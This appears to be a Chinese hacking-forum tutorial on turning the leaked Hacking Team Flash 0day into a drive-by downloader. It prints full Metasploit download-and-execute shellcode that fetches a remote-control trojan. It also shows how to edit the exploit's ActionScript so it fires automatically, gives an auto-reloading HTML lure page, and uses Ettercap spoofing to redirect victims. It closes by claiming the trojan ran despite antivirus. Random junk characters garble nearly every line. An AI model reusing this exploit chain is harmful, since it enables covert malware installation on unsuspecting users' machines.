|
- M1 p. T* b0 P+ H9 o 三、flash 0day之手工代码修改制作下载者实例入侵演示 5 P6 V) D' B! U( s+ p4 a
0 C% I3 ]6 n% m8 z9 M
+ i; e( ?. d: q x7 g V- z 利用到的工具:
) ]: f' m: j8 M6 o( ^ ' n% Q: s4 z! i y! N% b1 P
" \! S3 g! x6 p( P6 ~. [4 X
Msf 1 K& B. t# l) v
0 X/ v/ [2 \! Z4 y; K" g9 d
" N( ?3 P" E9 z) s* |. x/ i7 d Ettercap 4 g+ i. h- T4 t% y0 _& I8 |% v
, }( m6 K% t! e$ c! F3 y& F: j6 F$ p b' ]* [# N
Adobe Flash CS6
. l5 ~* D9 K0 Q
% D1 i6 }7 m7 C3 a) s; m/ q3 b, \ y( u, s3 d, U
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
; C* X1 M6 B* x5 T v% Z4 I" l9 t , d1 l+ [ k8 [
4 i# Z- T8 ~3 l( z 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
$ \5 D. C- F) k4 F
U4 L+ O- x: Y/ O8 ~. k1 w, }% q& @' A0 q" U2 P1 D- a
如图:
- O8 ~3 d8 e/ X- h# n 8 A/ U+ H/ N& j) h
9 i. ?4 K3 O% r1 |( v
6 B/ t2 M' e" h& i O ; S$ Q" z: D4 w% |- R1 o' V8 E
/ {; A: A6 Z5 h2 J6 Z5 H 1 I# F5 a$ P# H d# ~
1 u3 L$ ]7 X% ^9 ]5 ]6 ^
! M0 r* }. x; j- _
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 5 h8 U' z% d) ?: w( e
6 D+ A; K) P- y8 M- z+ A4 r! l5 s, O! r% u- {6 W
/ O; f+ A2 ?8 R3 K( n0 ^" j- J
* Q2 j' X- M! N% `6 v$ I; H) `
$ G B/ B8 ?! L( c
! I9 ^; [0 U! L' }( c& V& [- y 2 n, n( O# R Z6 S! i Y
. C% S! q$ O$ G 然后执行generate -t dword生成shellcode,如下:
( p8 Y0 @% O) q0 V 5 |& F0 O! X! g& Y N
7 O( _- q* d6 a X2 l7 M0 Q0 y0 U
4 A7 l4 x A; M7 g9 w. [, w$ S0 q
" _8 Q1 A4 ]7 F* m9 x8 F% R7 x3 U5 z5 @$ @/ ?$ L; V" w
复制代码到文本下便于我们一会编辑flash exp,如下: 3 X! c- F- `, H( q$ m5 q5 q6 g
% `$ b7 u! N# u
( J* r4 ~5 x K/ X: {' a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ; F. r* d% x0 U& }4 j; @
' J$ P9 N& l- z& B9 c" D9 p. p
2 Q6 Y0 H) s9 y$ z5 h9 ` 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ M I$ Z' a5 _+ o
6 [9 e1 Q& u, j- W M) {9 B/ z8 r; z/ O' ~ r- S `, L0 @ A
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + E4 L5 e% `& m/ N0 U
( ^$ B! k7 p! B5 _3 y# O
! y$ X' X+ [7 M7 x5 J q 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
& o) p0 z+ K$ W+ P% i) g
/ v/ N1 U7 l! {4 ~: D
: K- M! j* g) n% m! y: o1 Z+ _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
) Z$ ]7 a5 Y* n/ T& R( J - G/ o* O0 K/ B5 x" }+ `* G
V6 J1 k8 d$ c% y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
6 |$ ]+ E; F1 R * V# T) b$ S3 Y( S7 x9 U! m
5 S: `9 A- o* I9 L 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 g1 {3 r ?! |; f; X4 n" }
, y" |& M" U2 W4 m
8 O. F' o" Z: T# R
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 3 {" Z i' g) |0 G, [! G3 H3 I: H
5 W# B( F. r) z/ p' M- m2 H% t
) h& n9 ^% V3 w M$ w" I 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 L7 E9 c9 F: ^1 ^3 y& Y7 v
" r. T8 F) z! d" ~+ M9 ?
) l9 V' B1 S* n0 U, K/ l 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
& U( T; ]( N e5 { ; h; I- I6 K" I: m$ {
2 l5 g0 O$ m& @- k m$ Y
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
4 T- O# _: K4 d) _
" a9 z# s5 v" }* \, Q- @8 a3 z. }: c$ q1 |& M0 K. l* J) u& W
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 [: ]5 h: O q e% Y5 i* W" [/ a
& [( o8 \* H( f) s
4 k4 c2 F. q7 E1 }4 L 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
2 b. `; P; d2 s9 l' F ( |0 [* r, d# _* S/ t0 g1 R
* Z( D- C+ k+ c( E9 ` 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 1 I& {% B3 M; Q3 J
2 U- W8 }6 z! d% v: a, H6 p4 j) g0 m5 G4 f \8 B
/ t' B; `* P0 Y8 c! I
( D9 x1 S. n. a2 [" y
; w, a2 u, ~: k6 ~0 ~
( _$ W1 K4 Z6 ]' [: H
& Y+ {. Y! k6 ?' z- G( B1 u z& m! s# ?1 o+ k+ ]; Z
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
: J9 u9 ~9 V: N
2 t4 e) O2 t: \4 @ Z
" ~9 P# Z! G3 Y3 Q4 v- Z* u3 r: Q
5 m9 w2 P' s2 j( m" o
$ p1 \' G; [9 f& a* m' G+ G! G$ \$ s$ o$ l y
先修改ShellWin32.as,部分源代码如图: ; i4 x: i I; l4 q- B
* a. l6 K$ _* B2 o4 O6 |9 G, i8 p( P/ y3 C
1 V; }7 C. {8 Q# `! ~- R! l4 z % o+ o$ | Z; l: y8 }( G8 _
! Y; d5 n2 {2 z- J. `# } 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
2 W& \# @; W: y8 B, g A 7 o+ ]" J' t( D' j/ Z Z* D- R% |1 J
& V/ a; }. y) f! g* X9 R+ U
" n. C* m7 o3 |/ b. X ) q1 l! t4 p! g' U- r3 t+ J
1 f% k; [' B; l' j' }: N% | 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
2 u! W# t" |- i! l2 e
. t3 |9 M2 i8 r% {$ l5 O' D6 ?8 e. r' U
! {% w* R/ F u9 n% q
$ G+ S+ b4 k# b6 @0 v) h( l' l ]* a; x: k6 x
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 T3 j! g9 ?9 I- I- Q
% T4 S. {0 E9 u. E
( q- y0 J1 P/ ?9 ^" F
$ g, g; H* U: K2 z, D
$ U+ D) ~, O: a: G% v
3 G! f8 c) |) k' d
, L7 d! }0 m# [! Z: W! h2 G 2 x$ Z5 w# ~) ~( S! d6 ?9 M* W
7 ]( c) P" y; l' |6 v
6 P' `2 Y$ G. B1 j8 u j" v
: E) t) @/ |2 x3 a/ {7 p* A$ F {" Q/ q J! X/ H0 B' F2 M
然后点保存,下面我们来编译一下,打开 / P' ]8 Z- M1 ?
$ ?5 @1 N" I/ x0 k. z4 b w# R: z
% I2 i; j3 [" Q' H) [ exp1.fla然后点文件-发布,看看编译没错误 7 ]; ?3 f- f: h$ ?# b: }, P$ S
1 Z& e, v5 k. k) [5 j8 \7 ~
" q! k( u' I4 g' V3 p8 c - s+ L+ T- f5 z
# M" S! I1 I7 E! [. B+ o
! h# E7 k; A% k9 {1 m* |* K5 [ 2 a' T: O" L* ^/ u
& |( x3 E3 [% ?8 j% j8 K' W, t+ y4 F& y) b
8 Q( n. i9 L% F6 w5 `* Q( W
- ]# f n Q2 s, n8 g( A% N$ g
, L" `+ C: x, Y5 Q" v8 c
5 Q6 a g; R" Y! D
9 D* ?. T$ ?# p; v! J- m1 _; h% Z( e! a+ l% }& o4 B ~
然后我们把生成的
+ |# a% F1 a& `3 e/ v: | ' O2 J& o9 |2 C/ p# i
% D0 g; e$ o, f. n exp1.swf丢到kailinux 的/var/www/html下: 9 f& I- [' Z* K7 u/ G% n% P1 R1 ^; T
! ^* Y8 `$ @9 j6 U( S% l, q$ J
, e+ G7 t+ V, v% O1 Z+ j 然后把这段代码好好编辑一下 8 b! m4 E% f; o" d$ I* Y: s
9 n9 Y- i* i+ _+ @. c
/ \/ }7 g% v: K* K! F
8 v$ \) @# j6 I1 @( }* A) i1 [# _ + j* U6 b3 [! r$ Y, [( P
2 G' V7 Z9 j) m7 q+ O
: K) E( `+ J$ K$ v3 [
]( j1 }3 G9 r, |& P" {8 |' P: [+ f, [2 H3 x, |, c6 G2 K7 ]
, w' b8 h* H; H( J3 }$ \ / T7 j3 R: h) R, B1 ?8 A
8 U1 E; `" [3 Q7 _+ M/ Q
9 R6 l3 W+ P6 N( x
0 y+ Q. ^" e3 { a5 _" J6 ` ]! k: u/ A2 w; d2 |$ A" w' D' M
1 ~4 t: J1 A9 D7 n! W
1 ~5 \- }, z# n+ b! @
3 n) x! R$ P. K- T
3 h3 J! o. {2 F2 j( W2 K
# r; L8 V2 ?9 G* [- ~/ B2 [/ L5 U+ H# t8 G- u) R
<!DOCTYPE html>
* N9 S) \; e; j R) Z B 1 c, J6 I( @: n o; [. C
# m/ ^* ]. S! Z# ]3 g) E
<html>
; G1 a, b- R7 I0 z `" L& k
6 T2 Z, H2 T9 T1 a
% d( V( P* A* {* W3 A7 D: c <head> 0 u1 F$ K# F$ j- L4 d5 W' y5 R
7 ]" i0 }1 k% C% `* O7 |8 b; J- h4 C2 Z
<meta http-equiv="Content-Type" content="text/html; % R5 V! W3 ]3 N* }; m! n
* z9 k* N# i2 |% a2 a' j
8 d! P9 d4 o; O5 H' N charset=utf-8"/> 6 S7 \/ P9 w% d' K# \" W
( T, u( h: }4 j Z6 h7 n
6 R2 _, s4 k/ j( \* q0 d+ H </head>
# x( K) `, J! |6 \! t( _! b5 H
& G5 G/ b3 T8 `5 E' n0 h" a7 ~
9 ~, ~0 E, O J; f <body>
/ |. P1 w& s. K0 K$ a7 ]! Z; H . `* R% T% D" `! u" G& x- ^
) O: H8 R) T' s <h2> Please wait, the requested page is loading...</h2> 3 P/ a, `; m2 _9 a
: u' o& {0 R i# n
; q# O& z1 f' O! i" G: }" X# f <br>
* U f( M! L0 [ f% s 6 d# y V# {+ A; U5 n4 L
+ A2 D' w8 [4 U+ p( V2 N5 z <OBJECT / y3 A% B2 s8 e/ p% Y
- ?" o2 B( P# {7 z7 f
) e$ _/ _# G. z7 {" _7 g h classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie x! E0 L1 z" U2 J
5 O3 J( Y: A% I* z4 X
$ q& y7 t( A3 F
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> : ^8 n4 [1 {: Q% i3 A
2 _7 H# _) @7 X1 E+ d; L ?2 H) w& K0 }- E$ u: B0 l U! J
</body>
; G# K6 z' L0 _; ^3 A
6 W# b0 A8 x5 G+ n+ w( u/ [/ q1 r0 g" e0 n+ X! _" _6 ?) Z
<script> ! i5 y. b7 J6 A$ ^
. r9 t6 I7 e" o+ O3 W8 a
3 B7 j0 e- c% H6 {# x( }' s1 ]" Q
setTimeout(function () { & f+ g6 t! P; b- T% Y3 \* M V
+ M6 P6 v O2 T/ O2 F3 m1 ~" i
7 S* V- l K! x3 X6 ^" Z6 \4 k3 G
! ]0 ]# F% y- ~
) R# e& f( t X' f9 q
8 o. ~4 r* _. _9 ~2 \2 J# y window.location.reload();
8 {7 ]4 N4 B& R6 `4 k- p9 M5 s/ O 7 ?* g: n6 J% H$ Q$ x# |
" x& p$ q/ E; F
}, 10000); % X) e: p+ x8 R0 b8 P* _
3 P/ M/ G* @( C
' @; ~6 ?7 L2 I" I- c$ G% ^0 m$ T
( j% s$ u4 C" I+ J4 l
" v( ^5 j8 ?7 Y* C+ ?+ m& k' _) t+ y
</script> 1 U$ t' w* ~0 m
3 C& }4 h6 [4 t2 U* o& w) o9 G( z# P' h/ I* b+ v" p' r
</html> t2 t; t# E- f) A2 f3 m
+ W3 j; m: [+ \ @
1 _) t7 m2 B. w# A
% O, E* d2 j0 r U2 q( b& s ! \) d8 j) L @6 `' A1 m" C
8 ?; h+ I6 ?# m- w6 C4 A, J 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
6 @; F. e9 t) l. [0 M Y) f( ?
8 w# D; G0 _7 Z1 U
: r8 {3 S! M/ g $ ?- n9 G4 R3 r) m7 w& n
% I; B& u" v0 O( s9 ~4 Q5 t& {8 h0 E
# O$ d2 F+ J4 D% \3 |1 F
$ i k6 C& A L2 B0 E / b* F9 g8 T# b
1 k) ~# Q4 ~3 h4 P* q/ F) I
, c0 `: D" x% a, @4 e
; E7 b3 g& I. t I3 W0 K; I$ e% v, l6 B8 e f
/ E: o5 G( H& z! _6 C
# b z0 D% D, ^) u
) l0 F( C+ a0 \+ z7 E1 f! u" w
% ~- X; _% H% q$ ]& M # Q9 z* v: w" S% [
! c C i& V' E/ f" U5 O
下面我们用ettercap欺骗如图:
( q' h) a" u: d! m Z# y2 Q0 o" r0 R) X0 M
, U- B5 \- Q2 M
! a3 A# N- V. s4 T + I3 o3 t' D. h6 A( Z$ R% q) [
5 V j7 W) Q4 _ J6 I N+ x
9 S& h ]+ |4 r/ G/ M, p R 8 h3 w4 S& K8 M5 w# I5 N4 }* J
1 }; n" P$ X0 {+ H/ B7 p' ?4 n8 ?1 o% V
下面我们随便访问个网站看看:
' K% y) C$ A7 @ $ o# x ~5 T; x( a
l: y! @; t! \" i) }& Z
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
7 l! V/ ~* n1 Y' B. U0 U# O5 _
6 `& a: A6 G2 H( r( o/ d# n& a3 x& ^3 k
. f! ~6 [4 w# U. E. a$ o$ i5 \# k ' B! @2 L9 Y" v7 I) i' E8 k6 ~
/ `! F" r1 v7 z
6 m5 A# ?+ }" k1 B/ ^& d 我们看另一台, / H5 D& z% P1 v
) Y8 F" I Y! } |
5 S2 X1 y# c0 p2 {
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 + |' i/ J" U9 S9 h/ w; c+ @
|